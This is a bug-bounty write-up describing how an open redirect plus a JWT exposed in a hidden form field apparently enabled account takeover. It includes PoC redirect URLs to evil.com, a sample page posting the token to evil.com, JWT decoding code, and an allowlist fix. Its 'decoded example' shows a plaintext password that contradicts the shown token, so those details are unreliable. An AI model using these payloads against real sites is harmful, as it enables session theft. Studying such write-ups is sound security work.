Open Redirect → Response JWT Token Leakage → Full Account Takeover (ATO) 🚨⚠️

From Open Redirect to Account Takeover (ATO) ➟ How a Small Bug Turned Critical ⚡

In bug bounty hunting, not every bug looks valuable at first. Sometimes, what appears to be a "low severity" issue can actually become a critical chain when tested deeper. 💰💥

Recently, I came across an Open Redirect vulnerability. Normally, this is not considered a big deal. However, as I dug deeper, I discovered something shocking: the server was leaking a JWT token in the response. This combination allowed me to go from a harmless-looking bug to a Full Account Takeover (ATO). In this blog, I'll show exactly how I escalated a seemingly small bug into a full account takeover. 👨‍💻🤔

Here’s the full story 👇

🪝 Step 1 ➟ Finding the Open Redirect

The target endpoint looked like this:
  • https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fsub.pixellabgeeks.com%2Flogin

👉 When I changed the value of redirect_url=, I was able to send users to external domains.

✅ Works with proper URL encoding:

  • https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fevil.com  

❌ Fails without encoding:

  • https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

▶️ This confirmed an Open Redirect vulnerability. At this stage, it looked like a "low severity" bug.
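The behaviour observed in Step 1 (an encoded redirect_url value being accepted and followed off-site) is what an allowlist check is supposed to prevent. The following is an added example, not code from the original post and not the target's real implementation: it extracts redirect_url from the request URL the way the server would (parse_qs percent-decodes %3A%2F%2F back into ://), then contrasts a hypothetical substring check, a common cause of open redirects, with a strict allowlist validator. ALLOWED_HOSTS, naive_is_safe and is_safe_redirect are assumed names for this illustration; the test vectors include the post's evil.com URL plus bypasses practitioners routinely try (lookalike host, http downgrade, backslash/userinfo confusion).

```python
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist for this example; the post does not show the target's configuration.
ALLOWED_HOSTS = {"pixellabgeeks.com", "sub.pixellabgeeks.com"}


def redirect_param(request_url: str) -> str:
    """Extract redirect_url from the full request URL.

    parse_qs percent-decodes the value, so the %3A%2F%2F form from the post arrives
    at the application as a plain https:// URL.
    """
    query = parse_qs(urlsplit(request_url).query)
    return query.get("redirect_url", [""])[0]


def naive_is_safe(target: str) -> bool:
    """Hypothetical weak check: 'is our domain mentioned anywhere in the target?'.

    This is the kind of logic that yields an open redirect; it is shown only to
    contrast with the allowlist version below, not as the target's real code.
    """
    return "pixellabgeeks.com" in target


def is_safe_redirect(target: str) -> bool:
    """Allowlist check: https only, exact host match, no userinfo, no backslashes.

    Backslashes are rejected because browsers treat '\\' as '/' in https URLs,
    so 'https://evil.com\\@pixellabgeeks.com' is parsed as host pixellabgeeks.com
    by many server-side libraries but navigates to evil.com in the browser.
    """
    if "\\" in target:
        return False
    parts = urlsplit(target)
    try:
        port = parts.port  # raises ValueError on malformed ports
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username or parts.password or port:
        return False
    return parts.hostname in ALLOWED_HOSTS  # hostname is lowercased by urlsplit


# Constructed test vectors; the first two are the URLs from the post.
VECTORS = [
    "https://sub.pixellabgeeks.com/login",
    "https://evil.com",
    "https://pixellabgeeks.com.evil.com/",
    "https://evil.com/?next=pixellabgeeks.com",
    "https://evil.com\\@pixellabgeeks.com/",
    "http://pixellabgeeks.com/",
]

if __name__ == "__main__":
    poc = "https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fevil.com"
    print("decoded redirect_url:", redirect_param(poc))
    for v in VECTORS:
        print(f"{v!r:48} naive={naive_is_safe(v)!s:5} allowlist={is_safe_redirect(v)}")
```

Every vector except the first is rejected by the allowlist version, while the substring check lets four of them through; the exact-host comparison on a parsed URL is what closes the gap, not a longer denylist.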

💡 Pro Tip for Bug Hunters

Never stop at the first bug you find. Even a "low" issue like Open Redirect can escalate into a critical finding if you test deeper. 🔍

🔍 Vulnerability Details:

🔗 Endpoints Tested:
  • https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fsub.pixellabgeeks.com%2Flogin
  • https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fevil.com

✅ Encoding Reference:

  • %3A → :
  • %2F%2F → //
  • %2F → /

⚠️ Note ↴

Passing : literally instead of %3A was rejected by the endpoint; the redirect_url value had to be URL-encoded for the redirect to trigger.

❌ Without Encoding ↴

  • https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

✅ Confirmed:

  • Open Redirect to attacker-controlled domains (e.g., evil.com)
  • Server response leaking JWT tokens

🛠 Step 2 ➟ Inspecting the Response (Burp Suite)

Using Burp Suite, I:
  • Captured the request 🚨
  • Logged the request/response pair 🛡️
  • Replayed it in Repeater (confirmed the redirect was consistent) 🔁
  • Inspected the response (found a hidden JWT token starting with ey..., which is the Base64 encoding of {" at the start of the JSON header) 🔍

⚔️ Proof of Concept (PoC)

▶️ PoC URL:
🔗 Original URL:
  • https://pixellabgeeks.com/auth-redirect?redirect_url=https://sub.pixellabgeeks.com/login

🔗 Attacker-Controlled Domain:
  • https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

▶️ Observed Response:

  • .......<input type="hidden" name="token" value="eyJhbGciOiJSUzI1NiIsImtpZCI6Ijg1MjliZWYzMGU1MWMwNjY4MDhmYWUwMmM1MDRmZTY1MTU0NGFiMjQ0ZDY0NTQ3YjE3MGUxZjA4Y2U0ODMwOTAifQ.eyJhY3IiOiJ1cm46bWFjZTppbmNvbW1vbjppYXA6YnJvbnplIiwiYW1yIjoicHdkIiwiYXVkIjoiY2l2by1hcGktZ28tc2VydmljZSIsImF1dGhfdGltZSI6MTc1NjU3MTEwNCwiZXhwIjoxNzU2NjU3NTA0LCJncmFudF90eXBlIjoiYXV0aG9yaXphdGlvbl9jb2XXXXXXX">.......

🔓 Decoded JWT (Example):

{
  "email": "sevenx@pixellabgeeks.com",
  "pwd": "SEVENx@_007x",
  "user_id": "XXXXXXX",
  "aud": "cXXXXXXX",
  "iss": "https://pixellabgeeks.com",
  "exp": 175XXXXX7504,
  "iat": 175XXXXX1104,
  "auth_time": 175XXXXX04
}

🔓 Step 3 ➟ Decoding the JWT Token

👨‍💻 Base64 JWT Decode (Linux Command):
# JWT segments are base64url (- and _ instead of + and /) with the = padding stripped; translate and re-pad first, or base64 -d reports "invalid input"
echo "PASTE_YOUR_JWT_TOKEN_HERE" | cut -d "." -f2 | tr '_-' '/+' | awk '{ while (length($0) % 4) $0 = $0 "="; print }' | base64 -d

Inside the decoded payload, I found:
  • Email addresses 📧
  • Authentication details 🔑
  • Session information 📂
  • Expiry timestamps ⏳

This meant the leaked JWT could be used to hijack user sessions.

⚡ Step 4 ➟ Chaining the Attack

Here's how the chain looked:
  1. Open Redirect → Redirect the user to the attacker's domain
  2. Response Leak → The redirect response embeds the victim's JWT in a hidden form field
  3. Decode Token → Attacker reads the claims (email, session details, expiry)
  4. Hijack Session → Attacker presents the token and is treated as the victim

  • 🎯 Final Result: Full Account Takeover (ATO) 🚨

💥 Step 5 ➟ Impact

The combined vulnerability had a critical impact:
  • Full Account Takeover 🔓
  • Session Hijacking 🕵️
  • Authentication Bypass 🚪
  • Data Exposure 📂

  • 📌 Severity: Critical (CVSS ~9.8)

🏆 Key Takeaway

A low-severity bug can become a critical chain if you test deeper. Always test beyond the obvious. 🚀

🎁 TOOL PROMPT ↴

"Write me a Python script that decodes JWT tokens. The token always starts with ey.... The output should be displayed in JSON format with a hacker-style terminal color scheme (Green, Red, Blue). The tool should take the JWT token as input and automatically decode the header and payload. The signature should be displayed only in raw Base64 format. Add an arrow (👉) before each section to make the output look stylish."
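As an added example covering both the Step 3 decode and the tool described in the prompt above (this is not the author's script and not the target's code), the block below implements the decoder end to end: it pulls the token out of a hidden form field like the one Burp showed, splits the three segments, base64url-decodes header and payload (restoring the padding that `base64 -d` trips over), prints them as JSON in the requested colour scheme, and leaves the signature raw. The HTML body, the HS256 signing key and the claim values are constructed for the demo; only LEAKED_HEADER_SEGMENT is copied from the token fragment in the post (its payload is truncated there, so it is not decoded). Two caveats a practitioner should keep in mind: decoding is not verification (no key is checked here, the claims are readable by anyone holding the token, which is the whole point of the leak), and in the fragment above `amr` is the RFC 8176 authentication methods reference, so `"amr":"pwd"` records that the user logged in with a password rather than carrying the password itself.

```python
import base64
import hashlib
import hmac
import json
import re
from typing import Optional

# Header segment copied from the leaked token shown in the post (RS256 with a kid).
LEAKED_HEADER_SEGMENT = "eyJhbGciOiJSUzI1NiIsImtpZCI6Ijg1MjliZWYzMGU1MWMwNjY4MDhmYWUwMmM1MDRmZTY1MTU0NGFiMjQ0ZDY0NTQ3YjE3MGUxZjA4Y2U0ODMwOTAifQ"

# Constructed response body modelled on the hidden-input pattern in the post; the
# token is filled in at runtime. Not the target's real HTML.
SAMPLE_RESPONSE = ('<html><body><form method="POST" action="https://evil.com/">'
                   '<input type="hidden" name="token" value="{token}">'
                   '</form></body></html>')

# A compact JWS is three base64url segments separated by dots; the header always
# starts with "ey" because that is the Base64 of the two bytes {" opening the JSON.
TOKEN_RE = re.compile(r'name="token"\s+value="(ey[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*)"')


def b64url_decode(segment: str) -> bytes:
    """JWT segments drop the '=' padding; restore it or the decoder rejects the input."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _compact_json(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def make_sample_jwt(secret: bytes) -> str:
    """Build a constructed HS256 token whose claims mirror the shape of the leak.

    Key, subject and e-mail are made up for the example.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {
        "acr": "urn:mace:incommon:iap:bronze",
        "amr": "pwd",  # RFC 8176: authentication method reference, i.e. password login
        "aud": "example-api",
        "sub": "user-1234",
        "email": "victim@example.com",
        "auth_time": 1756571104,
        "exp": 1756657504,
    }
    signing_input = b64url_encode(_compact_json(header)) + "." + b64url_encode(_compact_json(payload))
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def extract_token(html: str) -> Optional[str]:
    """Find a JWT sitting in a hidden form field, as Burp showed it in the response."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def decode_jwt(token: str) -> dict:
    """Decode header and payload WITHOUT verifying the signature.

    Anyone holding the token can read these claims, which is why exposing it in an
    HTML response is a leak. The signature is returned raw (base64url) since it
    cannot be checked without the issuer's key.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected 3 dot-separated segments (header.payload.signature)")
    return {
        "header": json.loads(b64url_decode(parts[0])),
        "payload": json.loads(b64url_decode(parts[1])),
        "signature": parts[2],
    }


def leaked_header() -> dict:
    """Decode just the header segment copied from the post's token."""
    return json.loads(b64url_decode(LEAKED_HEADER_SEGMENT))


GREEN, RED, BLUE, RESET = "\033[92m", "\033[91m", "\033[94m", "\033[0m"


def pretty_print(decoded: dict) -> None:
    print(f"{GREEN}👉 HEADER{RESET}\n{json.dumps(decoded['header'], indent=2)}")
    print(f"{BLUE}👉 PAYLOAD{RESET}\n{json.dumps(decoded['payload'], indent=2)}")
    print(f"{RED}👉 SIGNATURE (raw base64url, unverified){RESET}\n{decoded['signature']}")


if __name__ == "__main__":
    token = make_sample_jwt(b"constructed-demo-secret")
    leaked = extract_token(SAMPLE_RESPONSE.format(token=token))
    pretty_print(decode_jwt(leaked))
    print("header from the post's token:", leaked_header())
```

Running it prints the constructed token's header and payload as JSON and then the header recovered from the post's own fragment, which shows alg RS256 and a kid; nothing in the output proves the token is valid, only that its contents are readable.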

🔄 Final Note ↴

  • Report outcome: Accepted as Duplicate 🥺
Not every bug gets a bounty, but every bug teaches a lesson. 💡 Today’s duplicate is tomorrow’s unique find. Keep hunting, keep learning! 🔥

Duplicate Today, New Skills Tomorrow 🚀✨

#BugBounty #CyberSecurity #EthicalHacking #SEVENxOFFICIAL #PLG
